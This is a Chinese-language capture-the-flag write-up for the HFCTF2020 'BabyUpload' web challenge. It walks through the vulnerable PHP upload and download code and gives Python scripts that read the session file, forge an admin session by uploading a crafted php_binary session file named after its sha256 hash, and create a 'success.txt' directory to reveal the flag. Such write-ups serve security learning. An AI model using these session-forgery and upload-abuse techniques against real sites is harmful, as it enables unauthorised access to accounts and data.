2020-虎符網(wǎng)絡安全賽道-Web-BabyUpload

復現(xiàn)環(huán)境:

https://buuoj.cn/challenges#[HFCTF2020]BabyUpload
https://www.ctfhub.com/#/challenge

解題過程:

代碼分析

將 session 的保存目錄設置為 /var/babyctf/,并且啟動 session,同時引入/flag內(nèi)容。

<?php
error_reporting(0);
session_save_path("/var/babyctf/");
session_start();
require_once "/flag";

判斷 session 中 username 是否為 admin,是的話判斷/var/babyctf/success.txt 是否存在,存在的話就把 success.txt 刪了,并顯示 flag。

highlight_file(__FILE__);
if($_SESSION['username'] ==='admin')
{
    $filename='/var/babyctf/success.txt';
    if(file_exists($filename)){
            safe_delete($filename);
            die($flag);
    }
}
else{
    $_SESSION['username'] ='guest';
}

獲取相關參數(shù),均為 POST 參數(shù),direction 表示是上傳(upload)還是下載(download)操作,attr 會被直接拼接在 /var/babyctf 這個路徑后面,如果 attr 為 private 則把用戶名繼續(xù)拼接在后面。

$direction = filter_input(INPUT_POST, 'direction');
$attr = filter_input(INPUT_POST, 'attr');
$dir_path = "/var/babyctf/".$attr;
if($attr==="private"){
    $dir_path .= "/".$_SESSION['username'];
}

上傳操作,上傳文件的 field 為 up_file,把文件名拼接在后面,同時加上下劃線和這個文件內(nèi)容的 sha256 摘要值(文件是我們上傳的,文件內(nèi)容知道的情況下這個值也是可以在本地算出來的。)

然后判斷是否有路徑穿越,逐級創(chuàng)建目錄,將文件儲存到下面上傳就結束了。

if($direction === "upload"){
    try{
        if(!is_uploaded_file($_FILES['up_file']['tmp_name'])){
            throw new RuntimeException('invalid upload');
        }
        $file_path = $dir_path."/".$_FILES['up_file']['name'];
        $file_path .= "_".hash_file("sha256",$_FILES['up_file']['tmp_name']);
        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
            throw new RuntimeException('invalid file path');
        }
        @mkdir($dir_path, 0700, TRUE);
        if(move_uploaded_file($_FILES['up_file']['tmp_name'],$file_path)){
            $upload_result = "uploaded";
        }else{
            throw new RuntimeException('error while saving');
        }
    } catch (RuntimeException $e) {
        $upload_result = $e->getMessage();
    }

下載操作,獲取要讀取的文件名(POST filename參數(shù)),拼接路徑,判斷是否有路徑穿越,然后將文件內(nèi)容返回。

} elseif ($direction === "download") {
    try{
        $filename = basename(filter_input(INPUT_POST, 'filename'));
        $file_path = $dir_path."/".$filename;
        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
            throw new RuntimeException('invalid file path');
        }
        if(!file_exists($file_path)) {
            throw new RuntimeException('file not exist');
        }
        header('Content-Type: application/force-download');
        header('Content-Length: '.filesize($file_path));
        header('Content-Disposition: attachment; filename="'.substr($filename, 0, -65).'"');
        if(readfile($file_path)){
            $download_result = "downloaded";
        }else{
            throw new RuntimeException('error while saving');
        }
    } catch (RuntimeException $e) {
        $download_result = $e->getMessage();
    }
    exit;
}
?>

所以要讀取 Flag,需求就很明確了:

偽造 session 使自己變成 admin -> 創(chuàng)建一個 success.txt 文件 -> 讀取 flag。

腳本利用

1.遠程讀取 session 文件內(nèi)容

利用if($direction === "upload"){ 這段代碼 通過readfile() 函數(shù)回顯讀取結果

然后構造請求來讀取這個文件內(nèi)容

  • attr 為空則直接讀取 /var/babyctf/ 下的文件
  • 文件名則為 sess_PHPSESSID內(nèi)容,固定格式
def ReadSession():
    
    url = target_url
    s = requests.get(url=url)
    sses = s.headers['Set-Cookie']
    sess = re.findall("PHPSESSID=(.+?); path=/",sses)
    # print(sess)
    data = {
        'attr':'.',
        'direction':'download',
        'filename':'sess_'+sess[0]
    }
    r = requests.post(url=url,data=data)
    print (r.content[len(s.content):])
出現(xiàn)回顯

2.偽造session
我們只需要上傳一個名為 sess 的文件,內(nèi)容為我們偽造的 session 內(nèi)容(跟進之前讀取的guest用戶的形式偽造),計算出它的摘要值,然后將 Cookie 中的 PHPSESSID 改為這個 sha256 值,即可成功偽造 session。

參考 https://blog.spoock.com/2016/10/16/php-serialize-problem/
判斷其 session 處理器為 php_binary,則使用本地的的 PHP,將其 session 處理器改為 php_binary,然后利用其來生成 session 文件。

注意:不能直接用文本編輯器生成,因為 session 文件前面還有個隱藏字符 08,普通編輯器無法錄入這個字符導致操作失敗。

def BeAdmin():
    # print(BytesIO('\x08usernames:5:"admin";'.encode('utf-8')))
    files = {
        "up_file": ("sess", BytesIO('\x08usernames:5:"admin";'.encode('utf-8')))
    }
    data = {
        'attr':'.',
        'direction':'upload'
    }
    url = target_url
    r = requests.post(url=url,data=data,files=files)
    session_id = hashlib.sha256('\x08usernames:5:"admin";'.encode('utf-8')).hexdigest()
    return session_id

3.然后就是在 /var/babyctf 下創(chuàng)建一個 success.txt 文件。

這里我們看到是用 file_exists 函數(shù)判斷文件是否存在的。

    $filename='/var/babyctf/success.txt';
    if(file_exists($filename)){
            safe_delete($filename);
            die($flag);
    }

在 PHP 文檔中寫到這個函數(shù)用于判斷文件或者目錄是否存在。

file_exists
(PHP 4, PHP 5, PHP 7)

file_exists — 檢查文件或目錄是否存在

雖然我們不能完全控制上傳的文件名,但上傳的路徑我們是可以控制的,所以我們只需要在 /var/babyctf/ 下創(chuàng)建一個 success.txt 目錄即可。

還記得之前的 attr 參數(shù)嗎,我們將其改為 success.txt,即可創(chuàng)建一個 success.txt 目錄。

def upload_success():
    files = {
        "up_file": ("test", BytesIO('good job!'.encode('utf-8')))
    }
    data = {
        'attr':'success.txt',
        'direction':'upload'
    }
    url = target_url
    r = requests.post(url=url,data=data,files=files)

4.利用PHPSESSID值的admin權限+ 上傳成功的success.txt 達到讀取flag的條件,成功讀取flag。

php_session_id = BeAdmin()
print(php_session_id)
cookies = {
    'PHPSESSID':php_session_id
}
url = target_url
s = requests.get(url)
r = requests.get(url=url,cookies=cookies)
print ('Now here is your flag!')
print (r.content[len(s.content):])
?著作權歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容